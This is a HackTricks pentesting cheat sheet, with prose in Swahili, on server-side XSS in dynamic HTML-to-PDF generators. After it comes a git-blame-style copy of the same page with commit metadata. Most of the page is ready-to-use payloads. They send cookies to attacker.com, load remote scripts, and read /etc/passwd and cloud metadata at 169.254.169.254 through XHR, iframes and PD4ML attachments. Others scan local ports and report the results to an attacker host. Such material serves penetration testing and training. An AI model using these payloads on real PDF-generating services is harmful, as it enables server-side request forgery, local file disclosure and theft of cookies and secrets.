hacktricks/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md

# Server Side XSS (Dynamic PDF)

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

## Server Side XSS (Dynamic PDF)

Ikiwa ukurasa wa wavuti unaunda PDF kwa kutumia pembejeo zinazodhibitiwa na mtumiaji, unaweza kujaribu **kudanganya bot** inayounda PDF ili **kutekeleza msimbo wa JS usio na mipaka**.\
Hivyo, ikiwa **bot ya kuunda PDF inapata** aina fulani ya **HTML** **tags**, itakuwa **inafasiri** hizo, na unaweza **kuitumia** tabia hii kusababisha **Server XSS**.

Tafadhali, fahamu kwamba lebo za `<script></script>` hazifanyi kazi kila wakati, hivyo utahitaji njia tofauti ya kutekeleza JS (kwa mfano, kutumia `<img` ).\
Pia, kumbuka kwamba katika unyakuzi wa kawaida utaweza **kuona/kupakua pdf iliyoundwa**, hivyo utaweza kuona kila kitu unachokiandika kupitia JS (ukitumia `document.write()` kwa mfano). Lakini, ikiwa **hutaweza kuona** PDF iliyoundwa, labda utahitaji **kuchota taarifa kwa kufanya ombi la wavuti kwako** (Blind).

### Uundaji wa PDF maarufu

- **wkhtmltopdf** inajulikana kwa uwezo wake wa kubadilisha HTML na CSS kuwa hati za PDF, ikitumia injini ya uwasilishaji ya WebKit. Chombo hiki kinapatikana kama zana ya amri ya chanzo wazi, na kufanya iweze kupatikana kwa matumizi mbalimbali.
- **TCPDF** inatoa suluhisho thabiti ndani ya mfumo wa PHP kwa uundaji wa PDF. Ina uwezo wa kushughulikia picha, grafiki, na usimbaji, ikionyesha uwezo wake wa kuunda hati ngumu.
- Kwa wale wanaofanya kazi katika mazingira ya Node.js, **PDFKit** inatoa chaguo linalofaa. Inaruhusu uundaji wa hati za PDF moja kwa moja kutoka HTML na CSS, ikitoa daraja kati ya maudhui ya wavuti na fomati zinazoweza kuchapishwa.
- Wandelezaji wa Java wanaweza kupendelea **iText**, maktaba ambayo si tu inarahisisha uundaji wa PDF bali pia inasaidia vipengele vya juu kama saini za dijitali na kujaza fomu. Seti yake kamili ya vipengele inafanya iweze kutumika kwa kuunda hati salama na za mwingiliano.
- **FPDF** ni maktaba nyingine ya PHP, inayojulikana kwa urahisi na urahisi wa matumizi. Imeundwa kwa wandelezaji wanaotafuta njia rahisi ya uundaji wa PDF, bila haja ya vipengele vya kina.


## Payloads

### Discovery
```markup
<!-- Basic discovery, Write somthing-->
<img src="x" onerror="document.write('test')" />
<script>document.write(JSON.stringify(window.location))</script>
<script>document.write('<iframe src="'+window.location.href+'"></iframe>')</script>

<!--Basic blind discovery, load a resource-->
<img src="http://attacker.com"/>
<img src=x onerror="location.href='http://attacker.com/?c='+ document.cookie">
<script>new Image().src="http://attacker.com/?c="+encodeURI(document.cookie);</script>
<link rel=attachment href="http://attacker.com">
```
### SVG

Miongoni mwa payloads zilizotajwa hapo awali zinaweza kutumika ndani ya payload hii ya SVG. Iframe moja inayofikia subdomain ya Burpcollab na nyingine inayofikia endpoint ya metadata zimewekwa kama mifano.
```markup
<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="root" width="800" height="500">
<g>
<foreignObject width="800" height="500">
<body xmlns="http://www.w3.org/1999/xhtml">
<iframe src="http://redacted.burpcollaborator.net" width="800" height="500"></iframe>
<iframe src="http://169.254.169.254/latest/meta-data/" width="800" height="500"></iframe>
</body>
</foreignObject>
</g>
</svg>


<svg width="100%" height="100%" viewBox="0 0 100 100"
xmlns="http://www.w3.org/2000/svg">
<circle cx="50" cy="50" r="45" fill="green"
id="foo"/>
<script type="text/javascript">
// <![CDATA[
alert(1);
// ]]>
</script>
</svg>
```
Unaweza kupata **mifumo mingine ya SVG** nyingi katika [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)

### Ufunuo wa njia
```markup
<!-- If the bot is accessing a file:// path, you will discover the internal path
if not, you will at least have wich path the bot is accessing -->
<img src="x" onerror="document.write(window.location)" />
<script> document.write(window.location) </script>
```
### Load an external script

Njia bora ya kutumia udhaifu huu ni kutumia udhaifu huo ili kufanya bot ipekee script unayodhibiti kwa ndani. Kisha, utaweza kubadilisha payload kwa ndani na kufanya bot iipakue kwa kutumia msimbo sawa kila wakati.
```markup
<script src="http://attacker.com/myscripts.js"></script>
<img src="xasdasdasd" onerror="document.write('<script src="https://attacker.com/test.js"></script>')"/>
```
### Soma faili la ndani / SSRF

{% hint style="warning" %}
Badilisha `file:///etc/passwd` kwa `http://169.254.169.254/latest/user-data` kwa mfano ili **ujaribu kufikia ukurasa wa wavuti wa nje (SSRF)**.

Ikiwa SSRF inaruhusiwa, lakini huwezi **kufikia** kikoa au IP ya kuvutia, [angalia ukurasa huu kwa njia za kuweza kupita](../ssrf-server-side-request-forgery/url-format-bypass.md).
{% endhint %}
```markup
<script>
x=new XMLHttpRequest;
x.onload=function(){document.write(btoa(this.responseText))};
x.open("GET","file:///etc/passwd");x.send();
</script>
```

```markup
<script>
xhzeem = new XMLHttpRequest();
xhzeem.onload = function(){document.write(this.responseText);}
xhzeem.onerror = function(){document.write('failed!')}
xhzeem.open("GET","file:///etc/passwd");
xhzeem.send();
</script>
```

```markup
<iframe src=file:///etc/passwd></iframe>
<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
<link rel=attachment href="file:///root/secret.txt">
<object data="file:///etc/passwd">
<portal src="file:///etc/passwd" id=portal>
<embed src="file:///etc/passwd>" width="400" height="400">
<style><iframe src="file:///etc/passwd">
<img src='x' onerror='document.write('<iframe src=file:///etc/passwd></iframe>')'/>&text=&width=500&height=500
<meta http-equiv="refresh" content="0;url=file:///etc/passwd" />
```

```markup
<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="Attached File: /etc/passwd" pos-x="195" />
```
### Kuchelewesha bot
```markup
<!--Make the bot send a ping every 500ms to check how long does the bot wait-->
<script>
let time = 500;
setInterval(()=>{
let img = document.createElement("img");
img.src = `https://attacker.com/ping?time=${time}ms`;
time += 500;
}, 500);
</script>
<img src="https://attacker.com/delay">
```
### Skana ya Bandari
```markup
<!--Scan local port and receive a ping indicating which ones are found-->
<script>
const checkPort = (port) => {
fetch(`http://localhost:${port}`, { mode: "no-cors" }).then(() => {
let img = document.createElement("img");
img.src = `http://attacker.com/ping?port=${port}`;
});
}

for(let i=0; i<1000; i++) {
checkPort(i);
}
</script>
<img src="https://attacker.com/startingScan">
```
### [SSRF](../ssrf-server-side-request-forgery/)

Uthibitisho huu unaweza kubadilishwa kwa urahisi kuwa SSRF (kama unaweza kufanya script ipakue rasilimali za nje). Hivyo jaribu tu kuutumia (soma metadata baadhi?).

### Attachments: PD4ML

Kuna injini kadhaa za HTML 2 PDF ambazo zinaruhusu **kuelezea viambatisho kwa PDF**, kama **PD4ML**. Unaweza kutumia kipengele hiki **kuambatisha faili yoyote ya ndani** kwenye PDF.\
Ili kufungua kiambatisho nilifungua faili hiyo kwa **Firefox na kubonyeza mara mbili alama ya Paperclip** ili **kuhifadhi kiambatisho** kama faili mpya.\
Kuchukua **jibu la PDF** na burp pia **kitaonyesha kiambatisho kwa maandiko wazi** ndani ya PDF.

{% code overflow="wrap" %}
```html
<!-- From https://0xdf.gitlab.io/2021/04/24/htb-bucket.html -->
<html><pd4ml:attachment src="/etc/passwd" description="attachment sample" icon="Paperclip"/></html>
```
{% endcode %}

## Marejeo

* [https://lbherrera.github.io/lab/h1415-ctf-writeup.html](https://lbherrera.github.io/lab/h1415-ctf-writeup.html)
* [https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/](https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/)
* [https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html](https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html)
* [https://infosecwriteups.com/breaking-down-ssrf-on-pdf-generation-a-pentesting-guide-66f8a309bf3c](https://infosecwriteups.com/breaking-down-ssrf-on-pdf-generation-a-pentesting-guide-66f8a309bf3c)

{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>
{% endhint %}
GitBook: [#3154] No subject 2022-04-30 10:09:20 +00:00			`# Server Side XSS (Dynamic PDF)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:17:18 +00:00			`{% hint style="success" %}`
			`Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:17:18 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:17:18 +00:00			`<summary>Support HackTricks</summary>`
arte 2024-01-01 17:15:42 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:17:18 +00:00			`* Check the [subscription plans](https://github.com/sponsors/carlospolop)!`
			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Share hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:17:18 +00:00			`{% endhint %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
GitBook: [#3525] No subject 2022-10-02 15:25:27 +00:00			`## Server Side XSS (Dynamic PDF)`
GitBook: [#3154] No subject 2022-04-30 10:09:20 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:17:18 +00:00			`Ikiwa ukurasa wa wavuti unaunda PDF kwa kutumia pembejeo zinazodhibitiwa na mtumiaji, unaweza kujaribu kudanganya bot inayounda PDF ili kutekeleza msimbo wa JS usio na mipaka.\`
			`Hivyo, ikiwa bot ya kuunda PDF inapata aina fulani ya HTML tags, itakuwa inafasiri hizo, na unaweza kuitumia tabia hii kusababisha Server XSS.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:17:18 +00:00			Tafadhali, fahamu kwamba lebo za `<script></script>` hazifanyi kazi kila wakati, hivyo utahitaji njia tofauti ya kutekeleza JS (kwa mfano, kutumia `<img` ).\
			Pia, kumbuka kwamba katika unyakuzi wa kawaida utaweza kuona/kupakua pdf iliyoundwa, hivyo utaweza kuona kila kitu unachokiandika kupitia JS (ukitumia `document.write()` kwa mfano). Lakini, ikiwa hutaweza kuona PDF iliyoundwa, labda utahitaji kuchota taarifa kwa kufanya ombi la wavuti kwako (Blind).
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:17:18 +00:00			`### Uundaji wa PDF maarufu`
GITBOOK-4018: change request with no subject merged in GitBook 2023-07-30 21:28:42 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:17:18 +00:00			`- wkhtmltopdf inajulikana kwa uwezo wake wa kubadilisha HTML na CSS kuwa hati za PDF, ikitumia injini ya uwasilishaji ya WebKit. Chombo hiki kinapatikana kama zana ya amri ya chanzo wazi, na kufanya iweze kupatikana kwa matumizi mbalimbali.`
			`- TCPDF inatoa suluhisho thabiti ndani ya mfumo wa PHP kwa uundaji wa PDF. Ina uwezo wa kushughulikia picha, grafiki, na usimbaji, ikionyesha uwezo wake wa kuunda hati ngumu.`
			`- Kwa wale wanaofanya kazi katika mazingira ya Node.js, PDFKit inatoa chaguo linalofaa. Inaruhusu uundaji wa hati za PDF moja kwa moja kutoka HTML na CSS, ikitoa daraja kati ya maudhui ya wavuti na fomati zinazoweza kuchapishwa.`
			`- Wandelezaji wa Java wanaweza kupendelea iText, maktaba ambayo si tu inarahisisha uundaji wa PDF bali pia inasaidia vipengele vya juu kama saini za dijitali na kujaza fomu. Seti yake kamili ya vipengele inafanya iweze kutumika kwa kuunda hati salama na za mwingiliano.`
			`- FPDF ni maktaba nyingine ya PHP, inayojulikana kwa urahisi na urahisi wa matumizi. Imeundwa kwa wandelezaji wanaotafuta njia rahisi ya uundaji wa PDF, bila haja ya vipengele vya kina.`
a 2024-02-06 03:10:27 +00:00
GITBOOK-4018: change request with no subject merged in GitBook 2023-07-30 21:28:42 +00:00
GitBook: [#3525] No subject 2022-10-02 15:25:27 +00:00			`## Payloads`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:17:18 +00:00			`### Discovery`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```markup
GitBook: [master] one page modified 2021-09-08 08:59:37 +00:00			`<!-- Basic discovery, Write somthing-->`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`<img src="x" onerror="document.write('test')" />`
GitBook: [master] one page modified 2021-09-08 08:59:37 +00:00			`<script>document.write(JSON.stringify(window.location))</script>`
			`<script>document.write('<iframe src="'+window.location.href+'"></iframe>')</script>`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`<!--Basic blind discovery, load a resource-->`
			`<img src="http://attacker.com"/>`
			`<img src=x onerror="location.href='http://attacker.com/?c='+ document.cookie">`
			`<script>new Image().src="http://attacker.com/?c="+encodeURI(document.cookie);</script>`
			`<link rel=attachment href="http://attacker.com">`
			```
GitBook: [#3525] No subject 2022-10-02 15:25:27 +00:00			`### SVG`
GitBook: [master] one page modified 2021-06-16 09:00:28 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:17:18 +00:00			`Miongoni mwa payloads zilizotajwa hapo awali zinaweza kutumika ndani ya payload hii ya SVG. Iframe moja inayofikia subdomain ya Burpcollab na nyingine inayofikia endpoint ya metadata zimewekwa kama mifano.`
GitBook: [master] one page modified 2021-06-16 09:00:28 +00:00			```markup
			`<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="root" width="800" height="500">`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`<g>`
			`<foreignObject width="800" height="500">`
			`<body xmlns="http://www.w3.org/1999/xhtml">`
			`<iframe src="http://redacted.burpcollaborator.net" width="800" height="500"></iframe>`
			`<iframe src="http://169.254.169.254/latest/meta-data/" width="800" height="500"></iframe>`
			`</body>`
			`</foreignObject>`
			`</g>`
GitBook: [master] one page modified 2021-06-16 09:00:28 +00:00			`</svg>`
GitBook: [#3154] No subject 2022-04-30 10:09:20 +00:00

			`<svg width="100%" height="100%" viewBox="0 0 100 100"`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`xmlns="http://www.w3.org/2000/svg">`
			`<circle cx="50" cy="50" r="45" fill="green"`
			`id="foo"/>`
			`<script type="text/javascript">`
			`// <![CDATA[`
			`alert(1);`
			`// ]]>`
			`</script>`
GitBook: [#3154] No subject 2022-04-30 10:09:20 +00:00			`</svg>`
GitBook: [master] one page modified 2021-06-16 09:00:28 +00:00			```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:17:18 +00:00			`Unaweza kupata mifumo mingine ya SVG nyingi katika [https://github.com/allanlw/svg-cheatsheet](https://github.com/allanlw/svg-cheatsheet)`
GitBook: [master] one page modified 2021-06-16 09:00:28 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:17:18 +00:00			`### Ufunuo wa njia`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```markup
			`<!-- If the bot is accessing a file:// path, you will discover the internal path`
			`if not, you will at least have wich path the bot is accessing -->`
			`<img src="x" onerror="document.write(window.location)" />`
			`<script> document.write(window.location) </script>`
			```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:17:18 +00:00			`### Load an external script`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:17:18 +00:00			`Njia bora ya kutumia udhaifu huu ni kutumia udhaifu huo ili kufanya bot ipekee script unayodhibiti kwa ndani. Kisha, utaweza kubadilisha payload kwa ndani na kufanya bot iipakue kwa kutumia msimbo sawa kila wakati.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```markup
			`<script src="http://attacker.com/myscripts.js"></script>`
			`<img src="xasdasdasd" onerror="document.write('<script src="https://attacker.com/test.js"></script>')"/>`
			```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:17:18 +00:00			`### Soma faili la ndani / SSRF`
GITBOOK-4018: change request with no subject merged in GitBook 2023-07-30 21:28:42 +00:00
			`{% hint style="warning" %}`
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:17:18 +00:00			Badilisha `file:///etc/passwd` kwa `http://169.254.169.254/latest/user-data` kwa mfano ili ujaribu kufikia ukurasa wa wavuti wa nje (SSRF).
GITBOOK-4018: change request with no subject merged in GitBook 2023-07-30 21:28:42 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:17:18 +00:00			`Ikiwa SSRF inaruhusiwa, lakini huwezi kufikia kikoa au IP ya kuvutia, [angalia ukurasa huu kwa njia za kuweza kupita](../ssrf-server-side-request-forgery/url-format-bypass.md).`
GITBOOK-4018: change request with no subject merged in GitBook 2023-07-30 21:28:42 +00:00			`{% endhint %}`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```markup
			`<script>`
			`x=new XMLHttpRequest;`
			`x.onload=function(){document.write(btoa(this.responseText))};`
			`x.open("GET","file:///etc/passwd");x.send();`
GitBook: [master] one page modified 2021-09-08 08:59:37 +00:00			`</script>`
			```

			```markup
			`<script>`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`xhzeem = new XMLHttpRequest();`
			`xhzeem.onload = function(){document.write(this.responseText);}`
			`xhzeem.onerror = function(){document.write('failed!')}`
			`xhzeem.open("GET","file:///etc/passwd");`
			`xhzeem.send();`
GitBook: [master] one page modified 2021-09-08 08:59:37 +00:00			`</script>`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```

			```markup
			`<iframe src=file:///etc/passwd></iframe>`
			`<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>`
			`<link rel=attachment href="file:///root/secret.txt">`
GitBook: [master] one page modified 2020-11-04 10:26:58 +00:00			`<object data="file:///etc/passwd">`
			`<portal src="file:///etc/passwd" id=portal>`
GITBOOK-4018: change request with no subject merged in GitBook 2023-07-30 21:28:42 +00:00			`<embed src="file:///etc/passwd>" width="400" height="400">`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`<style><iframe src="file:///etc/passwd">`
GITBOOK-4018: change request with no subject merged in GitBook 2023-07-30 21:28:42 +00:00			`<img src='x' onerror='document.write('<iframe src=file:///etc/passwd></iframe>')'/>&text=&width=500&height=500`
			`<meta http-equiv="refresh" content="0;url=file:///etc/passwd" />`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```

Added XSS LFI for dynamic PDF 2022-07-06 02:55:19 +00:00			```markup
			`<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="Attached File: /etc/passwd" pos-x="195" />`
			```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:17:18 +00:00			`### Kuchelewesha bot`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```markup
			`<!--Make the bot send a ping every 500ms to check how long does the bot wait-->`
			`<script>`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`let time = 500;`
			`setInterval(()=>{`
			`let img = document.createElement("img");`
			img.src = `https://attacker.com/ping?time=${time}ms`;
			`time += 500;`
			`}, 500);`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`</script>`
			`<img src="https://attacker.com/delay">`
			```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:17:18 +00:00			`### Skana ya Bandari`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```markup
			`<!--Scan local port and receive a ping indicating which ones are found-->`
			`<script>`
			`const checkPort = (port) => {`
Translated to Swahili 2024-02-11 02:13:58 +00:00			fetch(`http://localhost:${port}`, { mode: "no-cors" }).then(() => {
			`let img = document.createElement("img");`
			img.src = `http://attacker.com/ping?port=${port}`;
			`});`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`}`

			`for(let i=0; i<1000; i++) {`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`checkPort(i);`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`}`
			`</script>`
			`<img src="https://attacker.com/startingScan">`
			```
GitBook: [#3525] No subject 2022-10-02 15:25:27 +00:00			`### [SSRF](../ssrf-server-side-request-forgery/)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:17:18 +00:00			`Uthibitisho huu unaweza kubadilishwa kwa urahisi kuwa SSRF (kama unaweza kufanya script ipakue rasilimali za nje). Hivyo jaribu tu kuutumia (soma metadata baadhi?).`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:17:18 +00:00			`### Attachments: PD4ML`
GitBook: [#3714] No subject 2022-12-27 12:57:39 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:17:18 +00:00			`Kuna injini kadhaa za HTML 2 PDF ambazo zinaruhusu kuelezea viambatisho kwa PDF, kama PD4ML. Unaweza kutumia kipengele hiki kuambatisha faili yoyote ya ndani kwenye PDF.\`
			`Ili kufungua kiambatisho nilifungua faili hiyo kwa Firefox na kubonyeza mara mbili alama ya Paperclip ili kuhifadhi kiambatisho kama faili mpya.\`
			`Kuchukua jibu la PDF na burp pia kitaonyesha kiambatisho kwa maandiko wazi ndani ya PDF.`
GitBook: [#3714] No subject 2022-12-27 12:57:39 +00:00
			`{% code overflow="wrap" %}`
			```html
			`<!-- From https://0xdf.gitlab.io/2021/04/24/htb-bucket.html -->`
			`<html><pd4ml:attachment src="/etc/passwd" description="attachment sample" icon="Paperclip"/></html>`
			```
			`{% endcode %}`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`## Marejeo`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GITBOOK-4018: change request with no subject merged in GitBook 2023-07-30 21:28:42 +00:00			`* [https://lbherrera.github.io/lab/h1415-ctf-writeup.html](https://lbherrera.github.io/lab/h1415-ctf-writeup.html)`
			`* [https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/](https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/)`
			`* [https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html](https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html)`
			`* [https://infosecwriteups.com/breaking-down-ssrf-on-pdf-generation-a-pentesting-guide-66f8a309bf3c](https://infosecwriteups.com/breaking-down-ssrf-on-pdf-generation-a-pentesting-guide-66f8a309bf3c)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:17:18 +00:00			`{% hint style="success" %}`
			`Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:17:18 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:17:18 +00:00			`<summary>Support HackTricks</summary>`
arte 2024-01-01 17:15:42 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:17:18 +00:00			`* Angalia [mpango wa usajili](https://github.com/sponsors/carlospolop)!`
			`* Jiunge na 💬 [kikundi cha Discord](https://discord.gg/hRep4RUj7f) au [kikundi cha telegram](https://t.me/peass) au tufuatilie kwenye Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Shiriki mbinu za hacking kwa kuwasilisha PRs kwa [HackTricks](https://github.com/carlospolop/hacktricks) na [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repos za github.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:17:18 +00:00			`{% endhint %}`